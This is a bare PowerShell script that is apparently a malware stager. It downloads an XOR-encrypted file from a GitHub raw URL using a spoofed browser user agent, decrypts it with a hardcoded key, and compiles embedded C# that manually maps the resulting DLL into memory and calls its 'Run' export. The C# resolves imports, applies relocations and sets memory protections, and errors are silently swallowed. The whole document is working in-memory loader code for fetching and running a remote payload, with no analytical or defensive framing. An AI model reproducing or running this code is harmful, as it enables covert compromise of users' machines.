$dl  = "https://raw.githubusercontent.com/Intel-Boss/e/main/config.dat"
$k   = [byte[]]@(0x6C,0xD6,0x9B,0x5A,0xE3,0x6B,0xA4,0xF5,0xA6,0x2F,0xF0,0x32,0xD9,0x32,0xAA,0xDC)
$fn  = "Run"

try {

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$wc = New-Object Net.WebClient
$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36")
$enc = $wc.DownloadData($dl)

$buf = [byte[]]::new($enc.Length)
for ($i = 0; $i -lt $enc.Length; $i++) { $buf[$i] = $enc[$i] -bxor $k[$i % $k.Length] }

$cs = @'
using System;
using System.Runtime.InteropServices;

public class M {

    [DllImport("kernel32")] static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
    [DllImport("kernel32")] static extern bool VirtualProtect(IntPtr a, uint s, uint n, out uint o);
    [DllImport("kernel32")] static extern IntPtr LoadLibraryA(string n);
    [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true)]
    static extern IntPtr GetProcAddress(IntPtr h, string n);
    [DllImport("kernel32", EntryPoint="GetProcAddress")]
    static extern IntPtr GPA_Ord(IntPtr h, IntPtr o);

    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    delegate bool FnDllMain(IntPtr h, uint r, IntPtr p);
    [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
    delegate int FnRun();

    static IntPtr A(long b, int o) { return new IntPtr(b + o); }
    static IntPtr A(long b, uint o) { return new IntPtr(b + (long)o); }
    static IntPtr A(long b, long o) { return new IntPtr(b + o); }

    public static int E(byte[] pe, string exportName) {

        int lfa  = BitConverter.ToInt32(pe, 0x3C);
        int coff = lfa + 4;
        ushort nSec = BitConverter.ToUInt16(pe, coff + 2);
        int oh   = coff + 20;

        uint   sizeImg  = BitConverter.ToUInt32(pe, oh + 56);
        uint   sizeHdr  = BitConverter.ToUInt32(pe, oh + 60);
        ulong  imgBase  = BitConverter.ToUInt64(pe, oh + 24);
        uint   epRVA    = BitConverter.ToUInt32(pe, oh + 16);
        int    dd       = oh + 112;
        int    secStart = oh + 240;

        long ba = VirtualAlloc(IntPtr.Zero, sizeImg, 0x3000, 0x04).ToInt64();
        if (ba == 0) return -1;

        Marshal.Copy(pe, 0, new IntPtr(ba), (int)sizeHdr);

        for (int i = 0; i < nSec; i++) {
            int  so = secStart + i * 40;
            uint vSz = BitConverter.ToUInt32(pe, so + 8);
            uint vA  = BitConverter.ToUInt32(pe, so + 12);
            uint rSz = BitConverter.ToUInt32(pe, so + 16);
            uint rP  = BitConverter.ToUInt32(pe, so + 20);
            if (rSz > 0)
                Marshal.Copy(pe, (int)rP, A(ba, vA), (int)Math.Min(rSz, vSz));
        }

        long delta = ba - (long)imgBase;
        if (delta != 0) {
            uint relRVA  = BitConverter.ToUInt32(pe, dd + 40);
            uint relSize = BitConverter.ToUInt32(pe, dd + 44);
            if (relRVA > 0 && relSize > 0) {
                uint off = 0;
                while (off < relSize) {
                    long blk = ba + relRVA + off;
                    uint pageRVA  = (uint)Marshal.ReadInt32(new IntPtr(blk));
                    uint blockSz  = (uint)Marshal.ReadInt32(new IntPtr(blk + 4));
                    if (blockSz == 0) break;
                    int cnt = (int)(blockSz - 8) / 2;
                    for (int j = 0; j < cnt; j++) {
                        ushort entry = (ushort)Marshal.ReadInt16(new IntPtr(blk + 8 + j * 2));
                        int type = entry >> 12;
                        int eo   = entry & 0xFFF;
                        if (type == 0) continue;
                        IntPtr pa = A(ba, pageRVA + (uint)eo);
                        if (type == 10)
                            Marshal.WriteInt64(pa, Marshal.ReadInt64(pa) + delta);
                        else if (type == 3)
                            Marshal.WriteInt32(pa, Marshal.ReadInt32(pa) + (int)delta);
                    }
                    off += blockSz;
                }
            }
        }

        uint impRVA = BitConverter.ToUInt32(pe, dd + 8);
        if (impRVA > 0) {
            int io = 0;
            while (true) {
                long desc = ba + impRVA + io;
                uint nameRVA = (uint)Marshal.ReadInt32(new IntPtr(desc + 12));
                if (nameRVA == 0) break;

                string dllName = Marshal.PtrToStringAnsi(A(ba, nameRVA));
                IntPtr hMod = LoadLibraryA(dllName);

                uint origFT = (uint)Marshal.ReadInt32(new IntPtr(desc));
                uint firstT = (uint)Marshal.ReadInt32(new IntPtr(desc + 16));
                if (origFT == 0) origFT = firstT;

                int to = 0;
                while (true) {
                    long tv = Marshal.ReadInt64(A(ba, origFT + (uint)to));
                    if (tv == 0) break;
                    IntPtr fAddr;
                    if ((tv & (1L << 63)) != 0)
                        fAddr = GPA_Ord(hMod, new IntPtr(tv & 0xFFFF));
                    else {
                        string nm = Marshal.PtrToStringAnsi(A(ba, (int)tv + 2));
                        fAddr = GetProcAddress(hMod, nm);
                    }
                    Marshal.WriteInt64(A(ba, firstT + (uint)to), fAddr.ToInt64());
                    to += 8;
                }
                io += 20;
            }
        }

        for (int i = 0; i < nSec; i++) {
            int  so = secStart + i * 40;
            uint vSz = BitConverter.ToUInt32(pe, so + 8);
            uint vA  = BitConverter.ToUInt32(pe, so + 12);
            uint ch  = BitConverter.ToUInt32(pe, so + 36);
            bool x = (ch & 0x20000000u) != 0;
            bool w = (ch & 0x80000000u) != 0;
            uint prot = 0x02;
            if (x && w)      prot = 0x40;
            else if (x)      prot = 0x20;
            else if (w)      prot = 0x04;
            uint old;
            VirtualProtect(A(ba, vA), vSz, prot, out old);
        }

        if (epRVA > 0) {
            FnDllMain dm = (FnDllMain)Marshal.GetDelegateForFunctionPointer(
                A(ba, epRVA), typeof(FnDllMain));
            dm(new IntPtr(ba), 1, IntPtr.Zero);
        }

        uint expRVA = BitConverter.ToUInt32(pe, dd);
        if (expRVA > 0) {
            long ed = ba + expRVA;
            uint nNames    = (uint)Marshal.ReadInt32(new IntPtr(ed + 24));
            uint aFuncs    = (uint)Marshal.ReadInt32(new IntPtr(ed + 28));
            uint aNames    = (uint)Marshal.ReadInt32(new IntPtr(ed + 32));
            uint aOrdinals = (uint)Marshal.ReadInt32(new IntPtr(ed + 36));
            for (uint i = 0; i < nNames; i++) {
                uint nRVA = (uint)Marshal.ReadInt32(A(ba, aNames + i * 4));
                string name = Marshal.PtrToStringAnsi(A(ba, nRVA));
                if (name == exportName) {
                    ushort ord = (ushort)Marshal.ReadInt16(A(ba, aOrdinals + i * 2));
                    uint fRVA = (uint)Marshal.ReadInt32(A(ba, aFuncs + ord * 4));
                    FnRun run = (FnRun)Marshal.GetDelegateForFunctionPointer(
                        A(ba, fRVA), typeof(FnRun));
                    return run();
                }
            }
        }
        return -2;
    }
}
'@

Add-Type -TypeDefinition $cs
[M]::E($buf, $fn)

} catch {}
